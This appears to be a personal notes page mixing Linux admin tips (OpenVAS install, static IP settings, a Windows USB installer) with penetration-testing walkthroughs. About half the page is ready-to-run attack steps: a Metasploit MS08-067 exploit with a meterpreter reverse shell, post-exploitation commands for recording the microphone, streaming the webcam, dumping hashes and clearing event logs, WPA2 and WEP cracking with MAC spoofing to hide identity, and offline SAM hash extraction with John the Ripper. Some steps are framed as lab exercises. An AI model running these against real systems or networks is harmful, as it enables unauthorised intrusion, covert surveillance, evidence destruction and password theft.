Linux OS

Information about the Linux operating system

OpenVAS is no longer included by default with Kali Linux. To set up OpenVAS, perform the following steps. First make sure the Kali repository is listed in your sources.list file:

nano /etc/apt/sources.list

And make sure the following line is present.  If it is not, add it.

deb http://http.kali.org/kali kali-rolling main non-free contrib

You can now install OpenVAS with the following commands:

apt update

apt install openvas

openvas-setup

The openvas-setup command takes a while to complete, so be patient. When it finishes, copy the generated admin password into a text editor and save it. Next, rebuild the OpenVAS database with the following command:

openvasmd --rebuild

This command will also take a while to complete. Once it finishes, you can access the web interface at https://localhost:9392. The username is admin and the password is the one you saved earlier.

A dictionary attack against a WPA2-protected access point is very easy using Kali Linux 2.0 and wifite:

wifite --wpa --crack --aircrack --dict /usr/share/wordlists/sqlmap.txt

I would recommend using a larger dictionary file than the sqlmap.txt file. Several large dictionary files are available online.

The following should also work for changing an IP address from the command line on Linux:

Edit the file /etc/network/interfaces.

Change:

auto eth0
iface eth0 inet dhcp

To:

auto eth0
iface eth0 inet static
address 172.16.40.10
netmask 255.255.0.0
network 172.16.0.0
broadcast 172.16.255.255
gateway 172.16.2.47
dns-nameservers 172.16.2.4 172.16.2.15

Restart networking:

sudo /etc/init.d/networking restart

Information about Raspberry Pi can be found at http://www.raspberrypi.org/.

SD Card boot choices for Raspberry Pi:

Instructions for building a Pirate Radio setup can be found at http://makezine.com/projects/make-38-cameras-and-av/raspberry-pirate-radio/.

Follow these steps:

  1. Insert your USB Flash Drive into an available port.
  2. Open the Command Prompt (Admin) by right-clicking on the Start button, clicking Command Prompt (Admin), and then click Yes on the UAC prompt.
  3. Type “diskpart” and press Enter.
  4. Type “list disk” to determine the disk number of your USB Flash Drive. Type “select disk X”, where “X” is the disk number of your USB Flash Drive.
  5. Type “clean” to erase the contents of your USB Flash Drive.
  6. Type “create partition primary size=5000”. This will create a 5GB primary partition on the USB Flash Drive. You can later create an additional partition on the USB Flash Drive for persistent storage.
  7. Type “select partition 1”.
  8. Type “active” to make the partition active.
  9. Type “format fs=ntfs quick” to format the partition.
  10. Type “assign” to give the USB Flash Drive a drive letter.
  11. Copy the contents of the Windows 8.1 DVD to the USB Flash Drive.

Alternatively, you can download the Universal USB Installer from http://www.pendrivelinux.com and follow the instructions on the site.

Windows XP SP 2 Setup:

Make sure Automatic Updates are disabled, the Windows Firewall is off, and the system has been restarted at least once.

Metasploit:

use exploit/windows/smb/ms08_067_netapi

set rhost 192.168.1.45

exploit #Do not execute at this point if you want to add the payload below

? or help #see the list of available meterpreter commands

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <attacking_kali_host_ip>

set LPORT <local_port> #default port is 4444

You can verify the connection from the remote machine with the following command:

netstat -a | grep 4444 #4444 assumes default local port

Some interesting Meterpreter commands are:

hashdump #get password hashes to crack, e.g. with crackstation.net
record_mic #record audio
webcam_list #list available webcams
webcam_snap #take a picture with the webcam
webcam_stream #stream video from webcam
sysinfo #get remote system information
shutdown #turn off remote computer
reboot #reboot remote computer
ps #list processes running on remote computer
kill #end process running on remote computer
execute -f <file> #start program on remote machine
clearev #clear the event log
upload #send file to remote system
download #retrieve file from remote system

Cracking WEP in Kali Linux 2.0 has become extremely easy. Open WiFite from the Applications menu and at the prompt type:

wifite --wep

Follow the onscreen instructions and the work is done for you.


WEP cracking instructions for Kali Linux 1.0

>>> Open a new terminal window

airmon-ng

# Will show you a list of your available wireless interfaces
# Note the name of your wireless interface, normally wlan0 or mon0

airmon-ng stop wlan0

# Disables monitor mode on wlan0 if it was already running

ifconfig wlan0 down

# Brings the wireless interface down

macchanger --mac 00:11:22:33:44:55 wlan0

# Spoofs your MAC address to hide your identity

airmon-ng start wlan0

# Puts wlan0 into monitor mode

airodump-ng wlan0

# Lists the wireless access points in range
# For our lab, look for WEPDEmo and note its BSSID (MAC) and channel

airodump-ng -c 6 -w wepdemoattack --bssid 20:AA:4B:8B:A4:6E wlan0

# Start monitoring WEPDEmo for associations to attempt to crack
# -c 6 specifies the channel
# -w wepdemoattack specifies the name of the capture file to save as
# --bssid 20:AA:4B:8B:A4:6E the MAC of the access point you are attacking
# wlan0 the wireless card you are monitoring with

>>> Open a new terminal window

aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0

# Attempt to associate with the wireless access point
# -1 0: the 1 selects the attack type (fake authentication) and the 0 is the reassociation delay
# -a is the MAC of the access point being attacked
# -h is the spoofed MAC of our system
# -e is the access point's SSID
# wlan0 is the interface we are attacking with

aireplay-ng -3 -b 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 wlan0

# ARP request replay attack: replays captured ARP packets to the access point to generate new IVs

aircrack-ng -b 20:AA:4B:8B:A4:6E wepdemoattack-01.cap

# Will attempt to crack the WEP key from the IVs captured so far
# Checks when you run it and then again every 5000 IVs (shown as #Data in the airodump-ng terminal)

>>> Open a new terminal window

aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0

# Run this repeatedly to generate more traffic and speed up the attack

Eventually the aircrack-ng screen should show the correct WEP key:

26:27:F6:85:97 for my demo


It appears the 1607 build of Windows 10 breaks the cracking of passwords with pwdump and samdump2.

To crack a Windows 10 Local account password in Kali Linux 2.0 you will need to mount the drive, locate the directory containing the SAM file, dump the password hashes to a file, and then crack with John the Ripper.

Boot the target Windows computer from your Kali Linux 2.0 media. From time to time, when you try to access the hard drive containing the Windows partition, you may receive an error message related to the Windows hibernation file. To avoid this, shut down Windows from the command prompt with the command:

shutdown /s /t 0

This should prevent the hibernation file problem. Once you are in Kali, open Files and select your Windows hard drive to mount it. Open a terminal window and enter the command

mount

to determine the path to your Windows hard drive. Most of the time the Windows hard drive will be the last mount point in the list, normally a device like /dev/sda1, mounted at a path like /media/root/OSDisk. Change into the Windows/System32/config folder under your mount point. Use the following command to create a dump of the Windows password hashes:

pwdump SYSTEM SAM > /root/Desktop/SAM2

Then use John the Ripper to break the passwords.

john /root/Desktop/SAM2 --format=NT

For Kali Linux prior to version 2.0:

Open a terminal.
Open the drive in Computer so that it mounts.
Run mount to see the location of the drive.
Change to the /Windows/System32/config folder under the mount point.

bkhive SYSTEM /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

john /root/hash.txt --format=nt2

service postgresql start #start the db
service metasploit start # connect metasploit to database
db_rebuild_cache #build cache for searching
db_status # check status of db
db_nmap <target IP> #add listening ports to database
hosts # shows scanned targets
services # show services on targets
search <service name> # find a possible exploit
use exploit/<exploit name> # run the exploit
show options # for options to configure like set RHOST
check # will see if target is exploitable
exploit # to try the exploit